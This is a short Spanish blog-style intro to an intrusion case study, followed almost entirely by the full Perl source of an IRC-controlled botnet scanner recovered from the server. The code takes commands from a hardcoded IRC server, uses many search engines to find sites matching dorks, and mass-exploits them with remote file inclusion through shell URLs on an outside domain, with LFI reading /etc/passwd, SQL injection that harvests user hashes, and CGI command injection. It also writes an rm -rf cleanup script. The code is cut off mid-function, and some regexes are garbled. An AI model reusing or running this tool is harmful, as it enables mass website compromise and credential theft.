0 Analisis de una Intrusion y un bot
Est es una mini caso de estudio sobre lo que encontre hace poco en un servidor que tuvo una intrusion, veian como se cargaba el servidor en CPU y memoria y obviamente se cargaba por el acceso a I/O y todos los procesos de escan que hacian sin piedad, donde quedaron los tiempos donde tenias hackers que eran INVISIBLES y no inservibles? pero bueno que se yo no? jajajajaja
Bueno me toco ayudar a una persona que le hicieron una intrusion con inclusion de codigo, es bastante interesante porque se vio ejecutar perl Scan009.txt que me llamo la atencion y lo consegui del sitio donde bajo el botnet el ataque:
http://matudesign.com/dh/imagenes/Scan2009.txt
#!/usr/bin/perl
##################################################################
## ##
## ##
## 05/06/2008 ##
## Author : BitchX and Osirys ## ##
## Team : FullNetWork ##
## Ircd : irc.fullnetwork.org ##
## WebSite : ##
## Contact : safes[dot]modes[at]gmail[dot]com ##
## ##
## ##
## Release: v1 Private ##
## ##
## ##
#####################################################################################
### !!_/ PRIVATE
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
#######################################################
## CONFIGURATION //
#######################################################
my $id = "http://matudesign.com/dh/imagenes/02.txt??"; #Your RFI Response
#Shell printed on the Vulnerable Site
my $shell = "http://matudesign.com/dh/imagenes/cmd-shell.txt??";
my $ircd = "64.136.61.195";
my $port = "7000";
my $chan1 = "#offspring"; #Chan for Scan
my $chan2 = "#offspring"; #bot will be printed here too
my $nick = "[D]PRIVATE".(int(rand(100)));
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time.
#For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
#Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results,
# you can put a higher number, so more speed.
my $rfipidpr0c = 50;
my @User_Agent = &Agent();
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://matudesign.com/dh/imagenes/01.txt??";
my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol";
my $spreadpwd = "lol";
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;
my $sys = `uname -a`;
my $up = `uptime`;
if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}
if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}
$k=0;
if ( fork() == 0 ) {
&irc( $ircd, $port, $chan1, $chan2, $nick );
}
else {
exit;
}
sub irc () {
my ( $ircd, $port, $chan1, $chan2, $nick ) = @_;
$c0n = IO::Socket::INET->new(
PeerAddr => "$ircd",
PeerPort => "$port",
Proto => "tcp"
) or die "Can not connect on server!\n";
$c0n->autoflush(1);
print $c0n "NICK $nick\n";
print $c0n "USER priv 8 * : BitchX\n";
while ( $line = <$c0n> ) {
my $sys = `uname -a`;
my $up = `uptime`;
if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}
if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}
$k++;
if ( $line =~ /^PING \:(.*)/ ) {
print $c0n "PONG :$1";
}
if ( $line =~ /001/ ) {
print $c0n "JOIN $chan1\n";
writ1("4+1 Private v2 Scan ON");
writ1("4+1 Coded by BitchX and Osirys");
print $c0n "JOIN $chan2\n";
}
if (($line=~ /PRIVMSG $nick :!kill -p $killpwd/) && ($securityACT == 1)) {
writ1("Falow Hermano! ");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
elsif (($line=~ /PRIVMSG $nick :!kill -p $badkillpwd/) && ($securityACT == 1)) {
writ1("Error Killing the Bot (Null or bad Password) !");
}
elsif (($line=~ /PRIVMSG $chan1 :!kill/) && ($securityACT == 0)) {
writ1("Falow Hermano");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
if (($line =~ /PRIVMSG $chan1 :.rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/) && (fork() == 0)) {
my ($bug, $dork, $rfipid) = ($1, $2, $3);
writ1("4+1Status - Scan RFI Iniciando em 4- $rfipid sites/process ");
writ1("1 B ug :14 $bug");
$d0rk = clean($dork);
writ1("1 D ork :14 $d0rk");
my $a = $k . "a";
my $n4me = $a . "siti.txt";
find($d0rk, $n4me);
rfi($bug, $n4me, $d0rk, $rfipid);
writ1("4+1Status - Scan RFI Finalizado em 4- 1 D ork :14 $d0rk");
exit(0);
}
if (($line =~ /PRIVMSG $chan1 :!xml\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork) = ($1, $2);
writ1("4+1Status - Scan XML Iniciando ");
writ1("1 B ug :14 $bug ");
$d0rk = clean($dork);
writ1("1 D ork :14 $d0rk ");
my $b = $k . "b";
my $n4me = $b . "siti.txt";
find($d0rk, $n4me);
xml($bug, $n4me, $d0rk);
writ1("4+1Status - Scan XML Finalizado em 4- 1 D ork :14 $d0rk ");
exit(0);
}
if (($line =~ /PRIVMSG $chan1 :!cgi\s+(.*?)\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork, $icgi) = ($1, $2, $3);
writ1("4+1Status - Scan CGI Iniciando ");
writ1("1 B ug :14 $bug ");
writ1("1 I nject CGI :14 $icgi ");
$d0rk = clean($dork);
writ1("1 D ork :14 $d0rk ");
my $b = $k . "c";
my $n4me = $c . "siti.txt";
find($d0rk, $n4me);
cgi($bug, $n4me, $d0rk, $icgi);
writ1("4+1Status - Scan CGI Finalizado em 4- 1 D ork :14 $d0rk ");
exit(0);
}
if (($line =~ /PRIVMSG $chan1 :!pb\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork, $ipb) = ($1, $2);
writ1("4+1Status - Scan PB SQL INJ Iniciando ");
writ1("1 B ug :14 $bug ");
$d0rk = clean($dork);
writ1("1 D ork :14 $d0rk ");
my $b = $k . "d";
my $n4me = $d . "siti.txt";
find($d0rk, $n4me);
pb($bug, $n4me, $d0rk);
writ1("4+1Status - Scan PB SQL INJ Finalizado em 4- 1 D ork :14 $d0rk ");
exit(0);
}
if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork) = ($1, $2);
writ1("4+1Status - Scan LFI Iniciando ");
writ1("1 B ug :14 $bug ");
$d0rk = clean($dork);
writ1("1 D ork :14 $d0rk ");
my $b = $k . "e";
my $n4me = $e . "siti.txt";
find($d0rk, $n4me);
lfi($bug, $n4me, $d0rk);
writ1("4+1Status - Scan LFI Finalizado em 4- 1 D ork :14 $d0rk ");
exit(0);
}
if (($line =~ /PRIVMSG $chan1 :!php\s+(.*?)\s+(.*)/) && (fork() == 0)) {
my ($bug, $dork) = ($1, $2);
writ1("4+1Status - Scan PHP Iniciando ");
writ1("1 B ug :14 $bug ");
$d0rk = clean($dork);
writ1("1 D ork :14 $d0rk ");
my $b = $k . "f";
my $n4me = $f . "siti.txt";
find($d0rk, $n4me);
php($bug, $n4me, $d0rk);
writ1("4+1Status - Scan PHP Finalizado em 4- 1 D ork :14 $d0rk ");
exit(0);
}
if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/) && (fork() == 0)) {
my ($bug, $dork, $sqlpid) = ($1, $2, $3);
writ1("4+1Status - Scan SQL Iniciando em 4- $rfipid sites/process ");
writ1("1 B ug :14 $bug ");
$d0rk = clean($dork);
writ1("1 D ork :14 $d0rk ");
my $c = $k . "g";
my $n4me = $g . "siti.txt";
find($d0rk, $n4me);
sql($bug, $n4me, $d0rk, $sqlpid);
writ1("4+1Status - Scan SQL Finalizado em 4- 1 D ork :14 $d0rk ");
exit(0);
}
}
}
sub find () {
my $dork = $_[0];
my $name = $_[1];
my @engine;
$engine[0] = fork();
if ( $engine[0] == 0 ) {
my @glist = google( $dork, $name );
writ1("4+1Status - Total Encontrado GOOGLE ". scalar(@glist). " " );
exit;
}
$engine[1] = fork();
if ( $engine[1] == 0 ) {
my @all = alltheweb( $dork, $name );
writ1("4+1Status - Total Encontrado ALLTHEWEB ". scalar(@all). " " );
exit;
}
$engine[2] = fork();
if ( $engine[2] == 0 ) {
my @alt = altavista( $dork, $name );
writ1("4+1Status - Total Encontrado ALTAVISTA ". scalar(@alt). " " );
exit;
}
$engine[3] = fork();
if ( $engine[3] == 0 ) {
my @emsn = msn( $dork, $name );
writ1("4+1Status - Total Encontrado MSN ". scalar(@emsn). " " );
exit;
}
$engine[4] = fork();
if ( $engine[4] == 0 ) {
my @ysites = yahoo( $dork, $name );
writ1("4+1Status - Total Encontrado YAHOO ". scalar(@ysites). " " );
exit;
}
$engine[5] = fork();
if ( $engine[5] == 0 ) {
my @asksites = ask( $dork, $name );
writ1("4+1Status - Total Encontrado ASK ". scalar(@asksites). " " );
exit;
}
$engine[6] = fork();
if ($engine[6] == 0) {
my @aolsites = aol($dork,$name);
writ1("4+1Status - Total Encontrado AOL ". scalar(@aolsites). " " );
exit;
}
$engine[7] = fork();
if ( $engine[7] == 0 ) {
my @dmozsites = dmoz( $dork, $name );
writ1("4+1Status - Total Encontrado DMOZ ". scalar(@dmozsites). " " );
exit;
}
$engine[8] = fork();
if ($engine[8] == 0) {
my @webdesites = webde($dork,$name);
writ1("4+1Status - Total Encontrado WEB.DE ". scalar(@webdesites). " " );
exit;
}
$engine[9] = fork();
if ($engine[9] == 0) {
my @einetsites = einet($dork,$name);
writ1("4+1Status - Total Encontrado eiNET.net ".scalar(@einetsites)." " );
exit;
}
$engine[10] = fork();
if ($engine[10] == 0) {
my @virgilio = virgilio($dork, $name);
writ1("4+1Status - Total Encontrado VIRGILIO ". scalar(@virgilio). " ");
exit(0);
}
$engine[11] = fork();
if ($engine[11] == 0) {
my @abacho = abacho($dork,$name);
writ1("4+1Status - Total Encontrado ABACHO ".scalar(@abacho)." ");
exit(0);
}
foreach my $e(@engine){
waitpid($e,0);
}
}
sub rfi () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $rfipid = $_[3];
my @forks;
my $num = 0;
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1D ork4: 14 $dork " );
sleep(1);
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
my $test = "http://" . $site . $bug . $id . "??";
print "$test\n";
$count++;
if ( $count % $rfipid == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
if($count %100 == 0){
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug . $id . "??";
my $print = "http://" . $site . $bug . $shell . "?";
my $re = query($test,"3");
if ( $re =~ /3b1tchx3mailOK/ && $re =~ /uid=(.*)(([0-9,a-f]))/ ) {
os($test);
writ1("4+1Safe: OFF 4+ 1OS: $os 4+1 $print ");
writ1("4+1Uname -a: $un ");
writ1("4+1Uid / Gid: $id1 ");
writ2("");
}
elsif ( $re =~ /3b1tchx3mailOK/ ) {
os($test);
writ1("4+1Safe: ON 4+ 1OS: $os 4+1 $print ");
writ1("4+1Uname -a: $un ");
writ1("4+1Uid / Gid: $id1 ");
writ2("");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
sub xml () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1D ork4: 14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug;
my $print = "http://" . $site . $bug;
my $re = query($test,"3");
if ( $re =~ /faultCode/ && $re =~ /faultString/ && $re =~ /XML error: no element found at line 1/ ) {
writ1("4+1Safe Bug XML: $print ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
sub php () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1D ork4: 14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site;
my $print = "http://" . $site;
my $re = query($test,"3");
if ( $re =~ /Free (.+?).(.+?) (.+?) of (.+?).(.+?) (.+?)/ ) {
writ1("4+1Safe Bug PHP: $print ");
writ2("");
}
elsif ( $re =~ /safe_mode: (.+?)/ && $re =~ /PHP version: (.+?)/ && $re =~ /cURL: (.+?)/ && $re =~ /MySQL: (.+?)/ && $re =~ /MSSQL: (.+?)/ && $re =~ /PostgreSQL: (.+?)/ && $re =~ /Oracle: (.+?)/ ) {
writ1("4+1Safe Bug PHP: $print ");
writ2("");
}
elsif ( $re =~ /c999Shell v. 1.0 pre-release build/ ) {
writ1("4+1Safe Bug PHP: $print ");
writ2("");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
sub cgi () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $icgi = $_[3];
my @forks;
my $num = 0;
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1D ork4: 14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug . $icgi;
my $print = "http://" . $site . $bug . $icgi;
my $osinj = "|uname%20-a|";
my $os = "http://" . $site . $bug . $osinj;
my $re = query($test);
if ( $re =~ /l33tb1tchx1/ && $re =~ /uid=(.*)(([0-9,a-f]))/ ) {
cgi_os($os);
writ1("4+1Safe Bug CGI OFF: $print ");
writ1("4+1Uname -a: $un_cgi ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
sub pb () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1D ork4: 14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://" . $site . $bug;
my $print = "http://" . $site . $bug;
my $re = query($test,"3");
if ( $re =~ /l33tb1tchxPB'/ ) {
writ1("4+1Safe Bug PB SQL INJ: $print ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
sub lfi () {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
open( filez, '<', $name );
while ( my $a = ) {
$a =~ s/\n//g;
push( @tot, $a );
}
close filez;
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1D ork4: 14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site (@toexploit) {
$count++;
if ( $count % 100 == 0 ) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $inj = "../../../../../../../../../../../../../etc/passwd%00";
my $test = "http://" . $site . $bug . $inj;
my $print = "http://" . $site . $bug . $inj;
my $re = query($test,"3");
if ( $re =~ /root:x:/ ) {
writ1("4+1Safe Bug LFI: $print ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
sub sql() {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $sqlpid = $_[3];
my @forks;
my $num = 0;
open($file, "<", $name);
while (my $a = <$file>) {
$a =~ s/\n//g;
push(@tot,$a);
}
close($file);
remove($name);
my @toexploit = unici(@tot);
writ1("4+1Status - Total Cleaned Sites ". scalar(@toexploit). " 1D ork4: 14 $dork " );
writ1("4+1Status - Exploit START!" );
foreach my $site(@toexploit) {
my $test = "http://".$site.$bug; print "$test\n";
$count++;
if($count %$sqlpid == 0){
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://".$site.$bug;
my $print = "http://".$site.$bug;
my $re = query($test);
if ($re =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
if ($sqlpid == $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
writ1("4+1User: $user ");
writ1("4+1Hash: $hash ");
writ2("4+1SQL INJ: $print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
}
}
elsif ($re =~ m/:(.*)([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
$user =~ s/\<(.*)\>//g;
if ($user !~ /(\/|\<|\>|\")/) {
if ($sqlpid == $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
writ1("4+1User: $user ");
writ1("4+1Hash: $hash ");
writ2("4+1SQL INJ: $print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
}
}
}
elsif ($re =~ m/\"option\">(.*)([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
$user =~ s/<(.*)>//g;
$user =~ s/<|>//g;
if ($sqlpid == $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
writ1("4+1User: $user ");
writ1("4+1Hash: $hash ");
writ2("4+1SQL INJ: $print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1("4+1SQL INJ: $print ");
}
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}
sub google () {
my @gsites;
my $key = $_[0];
my $name = $_[1];
my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N");
my $ret = query($gtest);
if ($ret =~ /2008 Google/) {
@gsites = gfind($key,$name);
}
else {
writ1("1Banned by Google Engine, trying to bypass it!");
@gsites = gbypass($key,$name);
}
return @gsites;
}
sub gfind () {
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 900; $p += 100) {
my $g0gle = ("www.google.it/search?q=".key($key)."&num=100&hl=it&as_qdr=all&start=".$p."&sa=N");
my $gr = query($g0gle);
while ($gr =~ m/\"]*)\//g) {
my $k = $1;
if ($k !~ /google/) {
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push(@list, @grep);
}
}
}
return @list;
}
sub gbypass () { # Euroseek uses the same search type of google
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $p = 0 ; $p <= 1000 ; $p += 10 ) {
my $gp = ("http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$p."&string=".key($key));
my $re = query($gp);
while ($re =~ m//g ) {
my $k = $1;
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
return @lst;
}
sub alltheweb() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
my $All = ( "http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$i."&ocjp=1&q=".key($key)."&o=".$i );
my $re = query($All);
while ( $re =~ m/http:\/\/(.+?)\ /g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
return @lst;
}
sub altavista() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ($b = 1;$b <= 1000;$b += 10) {
my $Alt = ( "http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=". key($key) . "&stq=". $b );
my $re = query($Alt);
while ( $re =~ m/(.+?)\//g ) {
if ( $1 !~ /altavista/ ) {
my $k = $1;
$k =~ s/>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
if ( $re =~ /target=\"_self\">Succ/ ) { }
else {
return @lst;
}
}
return @lst;
}
sub msn() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $Msn = ( "http://search.live.com/results.aspx?q=". key($key). "&first=". $b. "&FORM=PERE" );
my $re = query($Msn);
while ( $re =~ m/\"]*)\//g ) {
if ( $1 !~ /msn|live/ ) {
my $k = $1;
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
sub yahoo () {
my @ysites;
my $key = $_[0];
my $name = $_[1];
my $ytest = ("http://www.search.yahoo.com/search?p=hello&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=1");
my $ret = query($ytest);
if ($ret =~ /We did not find results for/) {
return @ysites;
}
elsif ($ret =~ /title=\"Yahoo! Search results for hello\"/) {
@ysites = yfind($key,$name);
return @ysites;
}
else {
writ1("1Banned by Yahoo Engine, trying to bypass it !");
@ysites = ybypass($key,$name);
return @ysites;
}
}
sub yfind() {
my @lst;
my $key = $_[0];
my $name = $_[1];
for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
my $ylink = ( "http://search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $re = query($ylink);
while ( $re =~ m//g ) {
my $k = $1;
if ($k !~ /yahoo|/) {
my @grep = links($k);
open( $filez, ">>", $name );
foreach my $k (@grep) {
print $filez "$k\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
sub ybypass () { # GoodSearch uses the same search type of Yahoo
my @lst;
my $key = $_[0];
my $name = $_[1];
my $ybytest = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($key)."&page=1&osmax=16");
my $res = query($ybytest);
if ($res =~ /Your search did not yield any results/){
return @lst;
}
else {
for $p(1..50){
my $ybylink = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($key)."&page=".$p."&osmax=16");
my $rek = query($ybylink);
while ($rek =~ m/href=\"(.+?)\">(.+?)<\/a>/g) {
my $tsite = $2;
if (($tsite =~ /\./) && ($tsite !~ /<|>| /)){
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
}
sub ask () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $askt = ("http://it.ask.com/web?q=".key($key)."&qsrc=1&o=312&l=dir&dm=all");
my $asktest = query($askt);
if ($asktest =~ /non ha prodotto alcun risultato/) {
return @lst;
}
else {
for ($p=0;$p<=20;$p++){
my $asklink = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=612B74535B00F6CA7678625658F9B98C&dm=all&page=".$p);
my $re = query($asklink);
while($re =~ m/href=\"http:\/\/(.+?)\"/g){
my $tsite = $1;
if ($tsite !~ /ask|wikipedia/){
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
}
sub aol () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $aolt = ("http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=".key($key));
my $atest = query($aolt);
if ($atest =~ /returned no results.<\/h3>/) {
return @lst;
}
else {
for ($p=1;$p<=100;$p++){
my $aollink = ("http://search.aol.com/aol/search?query=".key($key)."&page=".$p."&nt=SG2&do=Search&invocationType=comsearch30&clickstreamid=3154480101243260576");
my $re = query($aollink);
while($re =~ m/
(.+?)\n-/g) {
my $tsite = $1;
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
return @lst;
}
}
sub dmoz () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $dmtest = ("http://search.dmoz.org/cgi-bin/search?search=".key($key));
my $dmq = query($dmtest);
if ($dmq =~ /No Open Directory Project<\/a><\/b> results found/){
return @lst;
}
elsif ($dmq =~ /of (.+?)\)
/){
my $ftot = $1;
if ($ftot <= 20) {
$max = 1;
}
else {
my $to = $ftot / 20;
if ($to =~ /(.+).(.+?)/){
$uik = $1 * 20;
$max = $uik +1;
}
elsif ($to =~ /[0-9]/) {
my $to--;
my $rej = $to * 20;
$max = $rej +1;
}
}
}
for ($p=1;$p<=$max;$p += 20){
my $dmozlink = ("http://search.dmoz.org/cgi-bin/search?search=".key($key)."&utf8=1&locale=it_it&start=".$p);
my $re = query($dmozlink);
if ($re =~ /\">Next<\/a>/) {
while($re =~ m/>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
}
return @lst;
}
sub webde () {
my $key = $_[0];
my $name = $_[1];
my @lst;
for $p(1..50){
my $webdelink = ("http://suche.web.de/search/web/?pageIndex=".$p."&su=".key($key)."&y=0&x=0&mc=suche@web@navigation@zahlen.suche@web");
my $re = query($webdelink);
while($re =~ m/href=\"http:\/\/(.+?)\">/g) {
my $tsite = $1;
if ($tsite !~ /\/search\/web|web.de|\" class=\"neww\"/){
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
sub einet () {
my $key = $_[0];
my $name = $_[1];
my @lst;
my $einetest = ("http://www.einet.net/view/search.gst?p=1&k=".key($key)."&s=0&submit=Search");
my $einet3st = query($einetest);
if ($einet3st =~ /Page 1 of\s+(.+?)<\/span>/){
my $totz = $1;
for ($p=1;$p<=$totz;$p++){
my $einetlink = ("http://www.einet.net/view/search.gst?p=".$p."&k=".key($key)."&s=0&submit=Search");
my $re = query($einetlink);
while($re =~ m/\s+(.+?)<\/span>/g) {
my $tsite = $1;
my @grep = links($tsite);
open( $filez, ">>", $name );
foreach my $tsite (@grep) {
print $filez "$tsite\n";
}
close $filez;
push( @lst, @grep );
}
}
}
return @lst;
}
sub virgilio() {
my $dork = $_[0];
my $name = $_[1];
my $vtest = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&Cerca=&lr=");
my $re = query($vtest);
if ($re =~ /Controlla che tutte le parole siano state digitate correttamente<\/span>/) {
return @list;
}
else {
for ($i = 0;$i <= 800; $i += 10) {
my $vlink = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&filter=1&site=&lr=&hits=10&offset=".$i);
my $re = query($vlink);
while($re =~ m//g) {
my $h = $1;
if ($h !~ /microsoft|wikipedia/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}
sub abacho() {
my $dork = $_[0];
my $name = $_[1];
my $atest = ("http://search.abacho.com/it/abacho.it/index.cfm?q=".key($dork)."&country=it&x=0&y=0");
my $re = query($atest);
if ($re =~ /We didn't find any results matching your query/) {
return @list;
}
else {
for ($i = 0;$i <= 2000; $i += 10) {
my $alink = ("http://search.abacho.com/it/abacho.it/index.cfm?offset=".$i."&poffset=0&StartCounter=".$i."&q=".key($dork)."&a=&b=&country=it&page=&d_html=&d_pdf=&d_msdoc=&d_xls=&d_ppt=&mesearchkey=&cluster=&coop=");
my $re = query($alink);
while ($re =~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}
sub remove() {
my $file = $_[0];
system("rm $file");
}
sub clean () {
$dork = $_[0];
if ( $dork =~ /allintexxt:/ ) {
writ1("Cleaning Dork from Google Search Keys!");
$dork =~ s/^allintexxt://g;
}
return $dork;
}
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
}
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
